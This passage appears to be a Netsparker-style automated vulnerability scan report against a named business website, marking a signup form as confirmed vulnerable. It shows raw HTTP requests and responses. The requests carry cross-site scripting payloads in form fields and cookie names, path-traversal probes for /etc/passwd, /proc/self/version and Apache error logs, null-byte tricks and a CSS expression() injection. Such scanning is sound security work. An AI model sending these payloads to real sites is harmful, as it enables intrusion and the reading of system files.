OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 289
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&pseudonym=3&emailAddress='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001350)%3c%2fscript%3e&firstName=Smith&lastName=Smith&companyName=Smith&password1=3&password2=3&termsOfService=1&receiveSpecialOfferEmail=1&x=0&y=0

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:03 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=D8BF56E508353A49397B922AEB4A1ADF; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { 
document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" 
action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="'"--></style></script><script>netsparker(0x00135..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST http://www.insideup.com/index.html
pseudonym POST 3
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST '"--></style></script><script>alert(0x00134B)</script>
companyName POST Smith
password1 POST 3
password2 POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 256
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&pseudonym=3&emailAddress=netsparker%40example.com&firstName=Smith&lastName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00134B)%3c%2fscript%3e&companyName=Smith&password1=3&password2=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:02 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=59611EAFC34F45C8464E9BE6AB493BB0; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
